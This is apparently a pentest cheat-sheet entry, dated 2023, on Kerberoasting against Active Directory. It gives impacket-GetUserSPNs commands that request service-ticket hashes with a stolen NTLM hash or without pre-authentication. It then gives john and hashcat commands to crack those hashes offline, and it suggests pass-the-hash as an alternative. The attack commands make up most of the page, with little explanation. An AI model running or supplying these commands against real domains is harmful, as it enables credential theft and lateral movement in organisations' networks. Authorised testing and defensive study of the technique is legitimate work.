Last modified: 2023-10-22
Kerberoasting is a attack technique against Kerberos with cracking passwords using a credential already gathered.
If we have a password hash of a user, we might be able to find another user credential using the hash.
impacket-GetUserSPNs -hashes <lmhash>:<nthash> example.local/username -outputfile hashes.txt # Without pre-authentication # -no-preauth: https://github.com/SecureAuthCorp/impacket/pull/1413 impacket-GetUserSPNs -no-preauth username -usersfile users.txt -dc-host <ip-or-host> example.local/
After finding hashes, we can crack it or use for pass-the-hash attack.
To crack, run the following commands:
john --format=krb5tgs --wordlist=wordlist.txt hash.txt # or hashcat -m 13100 -a 0 hash.txt wordlist.txt